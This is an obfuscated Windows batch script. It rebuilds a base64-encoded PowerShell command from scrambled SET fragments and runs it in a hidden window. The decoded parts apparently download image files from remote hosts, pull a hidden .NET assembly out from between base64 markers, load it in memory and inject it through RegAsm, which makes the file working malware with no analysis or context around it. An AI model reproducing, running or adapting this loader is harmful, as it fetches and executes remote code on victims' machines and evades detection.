@echo off
GOTO JFDFISOGJI
:FIGFGUNUJI
SET SGGJOOKIIO=ByAEUAYQBjAGgALQBPAGIAagBlAGMAdAAgAHsAIABTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAxACAAfQA
GOTO NDIOGKNOGN
:ONNDNNDDGI
SET FONOOHGGNJ=EIAeQB0AGUAd@wAgAD0AIAAnAGgAdAB0ACd@AOwAKACAAIAAgACAAIAAgACAAIAAkAEIAeQB
GOTO ODUSODFODG7
:DJDJGIHIDI
SET HNNNJJDUGN=A8ADwAQgBBAFMARQA2ADQAXwBTAFQAQQBSAFQAPgA+ACd@AOwAgACQAZQBuAGQARgBsAGEAZwAgAD0AIAAnADw
GOTO FNFIFJDJDJ2
:SFNOGGNNJD
SET DFDOONGIID=BlAG4AZABGAGwAYQBnACkAOwAKACAAIAAgACAAIAAgACAAIAAkAGwAbwBhAGQAZ
GOTO HKFSOFNONJ
:FFKNDFJDGO
SET INKFSNSFOJ=AAIAAgACQAdAB5AHAAZQAgAD0AIAAkAGwAbwBhAGQAZQBkAEEAd@wBzAGUAbQB
GOTO JJDIIFKIGG
:JSNOFGDNDG
SET DOFJSOIJDJ=bABUAHkAd@ABlAF0AOgA6AFQAbABzADEAMgAKACAAIAAgACAAIAAgACAAIABmAHUAbgBjAHQAaQBvAG4AIABEAG8Ad
GOTO GGJGJGGSIG
:JOSDODDSND
SET NGDDNFNGGD=kAbQBhAGd@AZQBCAHkAdABlAHMAIAAtAG4AZQAgACQAbgB1AGwAbAApACAAewAgACQAaQBt
GOTO IINIGUGFID
:KNOIHODNNN
SET GNDKFDDFHG=AIAAkAHMAaAB1AGYAZgBsAGUAZABMAGkAbgBrAHMAKQAgAHsAIAB0AHIAeQAgAHsAIAByAGUAdAB1AHIAbgAg
GOTO ODUSODFODG3
:JJDIIFKIGG
SET HJUJDJGNDO=iAGwAeQAuAEd@AZQB0AFQAeQBwAGUAKAAnAHQAZQBzAHQAd@ABvAHd@AZQByAHMAaABlAGwAbAAuAEgAbwBhAGEAY
GOTO GGJGJGGSIG8
:GNUGISGODN
SET FDSDNNFIIN=AIAAgACAAIAAgACAAd@gBlAHQAdQByAG4AIAAkAG4AdQBsAGwAIAB9ADsAIAAKACAAIAAgACAAIAAgACAAIAAkA
GOTO ONNDNNDDGI
:NDIOGKNOGN
SET FNJGOGNGOU=gAD4AIAAkAG4AdQBsAGwACgAgACAAIAAgACAAIAAgACAAJABpAG4AagBlAGMAIAA9ACAAJwBSAGUAZwBBAHMA
GOTO GOFGOUDFIN1
:DJJDFDGDDH
SET JGDJHOGJIG=UANgA5ADd@AOQBlAGEANQAyAGEANAAwAGYAYQA3ADd@AZQA5ADQAYwA2ADkAZA
GOTO GOFGOUDFIN6
:INJFGNIGGN
SET IDDHIHUOSF=AKQAgAHsAIAAkAHMAdABhAHIAdABJAG4AZABlAHgAIAArAD0AIAAkAHMAdABh
GOTO OFGJOIGFUI
:FJDOSIFIDN
SET ONINODISGI=DsAIAAKACAAIAAgACAAIAAgACAAIABmAG8Ad@gBlAGEAYwBoACAAKAAkAGwAaQBuAGsAIABpAG4
GOTO KNOIHODNNN
:FFIUFNONDD
SET OGNODOHDSD=gBJAG4AdgBvAGsAZQAoACQAbgB1AGwAbAAsACAAWwBvAGIAagBlAGMAdABbAF0A
GOTO NDGSOJGFOF
:OFGJOIGFUI
SET UJOISGDGIF=AHIAdABGAGwAYQBnAC4ATABlAG4AZwB0AGgAOwAgAAoAIAAgACAAIAAgACAAIAAgACQAYgBhAHMAZQA2ADQATABlA
GOTO JSNOFGDNDG0
:NDGSOJGFOF
SET DDHONJOIOG=XQAgACgAJwB0AHgAdAAuAGQAYQBvAGwAd@AB1AGgAbwBpAG8AawB1AHIAdABpAFd@ALwAwADAANgA2AGIANQBjAD
GOTO DJJDFDGDDH
:JFDFISOGJI
SET JJSGONJGIJ=powershell -Command "Start-Process powershell -WindowStyle Hidden -A
GOTO ODUSODFODG
:FHGGIIGOOS
SET FFDNGNJSFG=AbQBMAGkAbgBrAHMAIAAkAGwAaQBuAGsAd@wA7AAoAIAAgACAAIAAgACAAIAAgACAAaQBmACAAKAAkAG
GOTO JOSDODDSND
:KKIIFDFNDO
SET GFDHOJDISG=BkAG4AYQBrAC8AbQBvAGMALgBiAHUAaAB0AGkAZwAvAC8AOgBzACd@ALAAgACd@AMAAnACwAIAAnACd
GOTO GOFGOUDFIN8
:JSNOFGDNDG0
SET NNGDFGJNSS=G4AZwB0AGgAaAAgAD0AIAAkAGUAbgBkAEkAbgBkAGUAeAAgAC0AIAAkAHMAdABhAHIAdABJAG4AZABlA
GOTO JSNOFGDNDG1
:ODUSODFODG
SET DJUHGNDDSJ=rgumentList '-Command \"$sofigo = ''IAAgACAAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvA
GOTO DJFGGONSJF
:FNFIFJDJDJ
SET GJGIIGODFN=AbwBjAG8AbAAgAD0AIABbAE4AZQB0AC4AUwBlAGMAdQByAGkAdAB5AFAAd@gBvAHQAbwBjAG8A
GOTO JSNOFGDNDG
:FNFIFJDJDJ2
SET OFNDNHFOFH=APABCAEEAUwBFADYANABfAEUATgBEAD4APgAnADsAIAAkAHMAdABhAHIAdABJAG4AZABlAHgAIAA9ACAAJ
GOTO FNFIFJDJDJ3
:ODUSODFODG3
SET JIOISGDIGG=ACQAdwBlAGIAQwBsAGkAZQBuAHQALgBEAG8AdwBuAGwAbwBhAGQARABhAHQAYQAoACQAbABpAG4AawApACAAfQ
GOTO ODUSODFODG4
:ODUSODFODG4
SET SFNGGFSIGJ=AgAGMAYQB0AGMAaAAgAHsAIABjAG8AbgB0AGkAbgB1AGUAIAB9ACAAfQA7ACAACgAgACA
GOTO GNUGISGODN
:JSNOFGDNDG2
SET IIHJDDOISJ=AAkAGkAbQBhAGd@AZQBUAGUAeAB0AC4AUwB1AGIAd@wB0AHIAaQBuAGd@AKAAkAHMAdABhA
GOTO JSNOFGDNDG3
:GFSFFJIGKJ
SET DGUGFDDSOJ=BuAGd@AXQA6ADoAVQBUAEYAOAAuAEd@AZQB0AFMAdAByAGkAbgBnACgAJABpAG0AYQBnAGUAQgB5AHQAZQ
GOTO FNFIFJDJDJ0
:GOFGOUDFIN
SET FKDJHIIGFD=G0AIAAoAFsAd@wB0AHIAaQBuAGd@AWwBdAF0AJABsAGkAbgBrAHMAKQAgAAoAIAAgACAAIAAgACAAIAAgACQAdwBlA
GOTO JDDFIDOGFO
:IKGGIJKNFD
SET DFHDGFOIGD=\"'"
GOTO JDDFIDOGFO2
:FNFIFJDJDJ3
SET INONGDIFDU=ABpAG0AYQBnAGUAVABlAHgAdAAuAEkAbgBkAGUAeABPAGYAKAAkAHMAdABhAHI
GOTO FNFIFJDJDJ4
:FNFIFJDJDJ4
SET NDOJDOGUIG=AdABGAGwAYQBnACkAOwAgAAoAIAAgACAAIAAgACAAIAAgACQAZQBuAGQASQBuAGQAZQB4ACAAPQAgACQAaQBtAGEA
GOTO FNFIFJDJDJ5
:ODUSODFODG0
SET SJDGIGJDJF=agBlAGMAdAAgACQAbABpAG4AawBzACAALQBDAG8AdQBuAHQAIAAkAGwAaQBuAGsAd@wAuAEwAZQBuAGd@AdABoA
GOTO FJDOSIFIDN
:IINIGUGFID
SET IGNFINGDIO=AGEAZwBlAFQAZQB4AHQAIAA9ACAAWwBTAHkAd@wB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQ
GOTO GFSFFJIGKJ
:GJIGFJJIUG
SET DGDFJFODHO=0AGEAd@gB0AC0AUwBsAGUAZQBwACAAMQAgAH0AIAA+ACAAJABuAHUAbABsAAoAIAAgACAAIAAgAC
GOTO FFKNDFJDGO
:DFONUGISOF
SET ODGIUOGIJI=AHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7ACAACgAgACAAIAAgACAAIAAgACAAJABzAGgAdQBmAGYAbABlAGQATA
GOTO ODGNUJINNG
:ODUSODFODG7
SET JNOSIGDNFN=0AGUAd@wAyACAAPQAgACd@Ad@ABzADoALwAvACd@AOwAKACAAIAAgACAAIAAgACAAIAAkAGwAZgBzAGQAZgBzAGQA
GOTO ODUSODFODG8
:FNFIFJDJDJ7
SET GJGOGJNGGJ=CQAZQBuAGQASQBuAGQAZQB4ACAALQBnAHQAIAAkAHMAdABhAHIAdABJAG4AZABlAHg
GOTO INJFGNIGGN
:JSNOFGDNDG1
SET GGSGJOSDOD=HgAOwAKACAAIAAgACAAIAAgACAAIAAgACQAYgBhAHMAZQA2ADQAQwBvAG0AbQBhAG4AZAAgAD0AI
GOTO JSNOFGDNDG2
:JSNOFGDNDG8
SET FSKDJGJINF=CAAJABlAG4AZABJAG4AZABlAHgAIAA9ACAAJABpAG0AYQBnAGUAVABlAHgAdAAuAEkAbgB
GOTO JSNOFGDNDG9
:FNFIFJDJDJ5
SET DDJJDOIDOO=ZwBlAFQAZQB4AHQALgBJAG4AZABlAHgATwBmACgAJABlAG4AZABGAGwAYQBnACkAOwAKACAAIAAgACAAIA
GOTO FNFIFJDJDJ6
:JSNOFGDNDG7
SET HSHIIFGIHN=AbQBCAGEAd@wBlADYANABTAHQAd@gBpAG4AZwAoACQAYgBhAHMAZQA2ADQAQwBvAG0AbQBhAG4AZAApADsAIAAgA
GOTO JSNOFGDNDG8
:ODGNUJINNG
SET DGNGOOIGIN=BpAG4AawBzACAAPQAgAEd@AZQB0AC0AUgBhAG4AZABvAG0AIAAtAEkAbgBwAHUAdABPAGIA
GOTO ODUSODFODG0
:JDDFIDOGFO
SET FFNUHGDOGD=GIAQwBsAGkAZQBuAHQAIAA9ACAATgBlAHd@ALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBl
GOTO DFONUGISOF
:JSNOFGDNDG3
SET GGKIGGOFGK=HIAdABJAG4AZABlAHgALAAgACQAYgBhAHMAZQA2ADQATABlAG4AZwB0AGgAaAApADsACgAgACAAIAAgACAAIA
GOTO JSNOFGDNDG4
:HKFSOFNONJ
SET GFUFDDSOJG=QBkAEEAd@wBzAGUAbQBiAGwAeQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AUgBlAGYAbABlAGMAdABpAG8AbgAuAEE
GOTO GGJGJGGSIG3
:GOFGOUDFIN8
SET DDSGOIIGGN=@ALAAgACQAaQBuAGoAZQBjACwAIAAnADAAJwAgACwAIAAnAHgAOAA2ACd@AKQApAH0AfQA7AAoA
GOTO GOFGOUDFIN9
:FINOGFDDGF
SET FIGGFDISNO=AGIAZwBjAHQAZAB0AGIAegB2AGd@Ad@ABkAHgAagBpAHYAYQBmAHkALgBzAHUAd@ABhAGIAYQBzAGUALgBjAG8AL
GOTO JKIUFUDFOS
:ODUSODFODG9
SET JFDDIJODIO=AgACAAJABsAGkAbgBrAHMAIAA9ACAAQAAoACgAJABsAGYAd@wBkAGYAd@wBkAGd@AIAArACAAJwB5
GOTO FINOGFDDGF
:GGJGJGGSIG
SET GGDIFFGFNG=wBuAGwAbwBhAGQARABhAHQAYQBGAHIAbwBtAEwAaQBuAGsAd@wAgAHsAIABwAGEAd@gBhA
GOTO GOFGOUDFIN
:GGJGJGGSIG4
SET JIDSHKNGKI=AAIAAgACAAIAAgACAAMQAuAC4AMgAgAHwAIABGAG8Ad@gBFAGEAYwBoAC0ATwBiAGoAZQBjAHQAIAB7ACAAUwB
GOTO GJIGFJJIUG
:JDDFIDOGFO0
SET NIINGDKDNO=tem.convert]::Frombase64string^($sofigo.replace^(''d@'',''c''^)^)^);iex $OWjuxD
GOTO IKGGIJKNFD
:JSNOFGDNDG5
SET NNIGOGSOFN=lAHgATwBmACgAJABlAG4AZABGAGwAYQBnACkAOwAKACAAIAAgACAAIAAgACAAIAAgACQAYwBvAG0Ab
GOTO JSNOFGDNDG6
:JSNOFGDNDG6
SET KFIKGFNUIG=QBhAG4AZABCAHkAdABlAHMAIAA9ACAAWwBTAHkAd@wB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8
GOTO JSNOFGDNDG7
:GGJGJGGSIG0
SET IOUJSDDIGN=AAPQAgACQAaQBtAGEAZwBlAFQAZQB4AHQALgBJAG4AZABlAHgATwBmACgAJA
GOTO SFNOGGNNJD
:DGJGGDIGGS
SET NNIHDSFGUU=BkAGYAd@wBkAGd@AIAArACAAJwBuAGd@AZgBrAGoAZgB5AC4AaQBjAHUALwBpAG0AZwAvAGkAbQBhAGd@A
GOTO NDOGGFGDSO
:JDDFIDOGFO3

GOTO JDDFIDOGFO4
:ODUSODFODG8
SET ISFJUODGOG=ZwAgAD0AIAAgACQAQgB5AHQAZQBzACAAKwAkAEIAeQB0AGUAd@wAyADsACgAgACAAIAAgACAAIA
GOTO ODUSODFODG9
:JKIUFUDFOS
SET GNOIGGDJOI=wBzAHQAbwByAGEAZwBlAC8AdgAxAC8AbwBiAGoAZQBjAHQALwBwAHUAYgBsAGkAY
GOTO IIIODGIHND
:JDDFIDOGFO2
%JJSGONJGIJ%%DJUHGNDDSJ%%GSFJIGGIJO%%GJGIIGODFN%%DOFJSOIJDJ%%GGDIFFGFNG%%FKDJHIIGFD%%FFNUHGDOGD%%ODGIUOGIJI%%DGNGOOIGIN%%SJDGIGJDJF%%ONINODISGI%%GNDKFDDFHG%%JIOISGDIGG%%SFNGGFSIGJ%%FDSDNNFIIN%%FONOOHGGNJ%%JNOSIGDNFN%%ISFJUODGOG%%JFDDIJODIO%%FIGGFDISNO%%GNOIGGDJOI%%ISFIOINDJF%%NNIHDSFGUU%%GKNOINOFDJ%%KOIOUNFGID%%FFDNGNJSFG%%NGDDNFNGGD%%IGNFINGDIO%%DGUGFDDSOJ%%DGGGFDNSGU%%HNNNJJDUGN%%OFNDNHFOFH%%INONGDIFDU%%NDOJDOGUIG%%DDJJDOIDOO%%NDIONDDSHO%%GJGOGJNGGJ%%IDDHIHUOSF%%UJOISGDGIF%%NNGDFGJNSS%%GGSGJOSDOD%%IIHJDDOISJ%%GGKIGGOFGK%%FDODDDNJFF%%NNIGOGSOFN%%KFIKGFNUIG%%HSHIIFGIHN%%FSKDJGJINF%%NGNDJUNGND%%IOUJSDDIGN%%DFDOONGIID%%GFUFDDSOJG%%KDOKDFHFKG%%JIDSHKNGKI%%DGDFJFODHO%%INKFSNSFOJ%%HJUJDJGNDO%%NKGDGODDGI%%SGGJOOKIIO%%FNJGOGNGOU%%GNGGOFDONG%%FINSGFDIOU%%OGNODOHDSD%%DDHONJOIOG%%JGDJHOGJIG%%OIDHSINNIS%%GFDHOJDISG%%DDSGOIIGGN%%NGKNIGOGSF%%NIINGDKDNO%%DFHDGFOIGD%
GOTO JDDFIDOGFO3
:NDOGGFGDSO
SET GKNOINOFDJ=ZQAuAGoAd@ABnAD8AMQAyADd@AMQAxADMANAAzACd@AKQApADsACgAgACAAIAAgACAAIA
GOTO DJFGGONSJF5
:IIIODGIHND
SET ISFIOINDJF=wAvAG4AYQBuAG8ALwBpAG0AYQBnAGUALgBqAHAAZwA/ADEAMgA3ADEAMQAzADQAMwAnACkALAAgACgAJABsAGYAd@w
GOTO DGJGGDIGGS
:GOFGOUDFIN2
SET FINSGFDIOU=GUALgBHAGUAdABNAGUAdABoAG8AZAAoACd@AbABmAHMAZwBlAGQAZABkAGQAZABkAGQAYQAnACkAL
GOTO FFIUFNONDD
:GOFGOUDFIN6
SET OIDHSINNIS=BjADIANwA0ADUAYQA0ADIAYgA3AC8AYgBvAGwAYgAvAGsAbgBpAGwAYQBkAC8AawBpAGwAYQ
GOTO KKIIFDFNDO
:GGJGJGGSIG8
SET NKGDGODDGI=QBhAGEAYQBzAGQAbQBlACd@AKQA7AAoAIAAgACAAIAAgACAAIAAxAC4ALgAyACAAfAAgAEYAbw
GOTO FIGFGUNUJI
:DJFGGONSJF
SET GSFJIGGIJO=GkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAGMAdQByAGkAdAB5AFAAd@gBvAHQ
GOTO FNFIFJDJDJ
:GOFGOUDFIN9
SET NGKNIGOGSF='';$oWjuxd = [system.Text.encoding]::Unicode.GetString^([sys
GOTO JDDFIDOGFO0
:DJFGGONSJF5
SET KOIOUNFGID=AgACAAIAAkAGkAbQBhAGd@AZQBCAHkAdABlAHMAIAA9ACAARABvAHd@AbgBsAG8AYQBkAEQAYQB0AGEARgByAG8
GOTO FHGGIIGOOS
:JSNOFGDNDG9
SET NGNDJUNGND=kAGUAeABPAGYAKAAkAGUAbgBkAEYAbABhAGd@AKQA7ACAAIAAgACQAZQBuAGQASQBuAGQAZQB4AC
GOTO GGJGJGGSIG0
:JSNOFGDNDG4
SET FDODDDNJFF=AgACQAZQBuAGQASQBuAGQAZQB4ACAAPQAgACQAaQBtAGEAZwBlAFQAZQB4AHQALgBJAG4AZAB
GOTO JSNOFGDNDG5
:FNFIFJDJDJ0
SET DGGGFDNSGU=BzACkAOwAKACAAIAAgACAAIAAgACAAIAAgACQAd@wB0AGEAd@gB0AEYAbABhAGd@AIAA9ACAAJw
GOTO DJDJGIHIDI
:FNFIFJDJDJ6
SET NDIONDDSHO=AgACAAIAAgAGkAZgAgACgAJABzAHQAYQByAHQASQBuAGQAZQB4ACAALQBnAGUAIAAwACAALQBhAG4AZAAgA
GOTO FNFIFJDJDJ7
:GOFGOUDFIN1
SET GNGGOFDONG=bQAnADsACgAgACAAIAAgACAAIAAgACAAJABtAGUAdABoAG8AZAAgAD0AIAAkAHQAeQBwA
GOTO GOFGOUDFIN2
:GGJGJGGSIG3
SET KDOKDFHFKG=Ad@wBzAGUAbQBiAGwAeQBdADoAOgBMAG8AYQBkACgAJABjAG8AbQBtAGEAbgBkAEIAeQB0AGUAd@wApADsACgAgAC
GOTO GGJGJGGSIG4
:JDDFIDOGFO4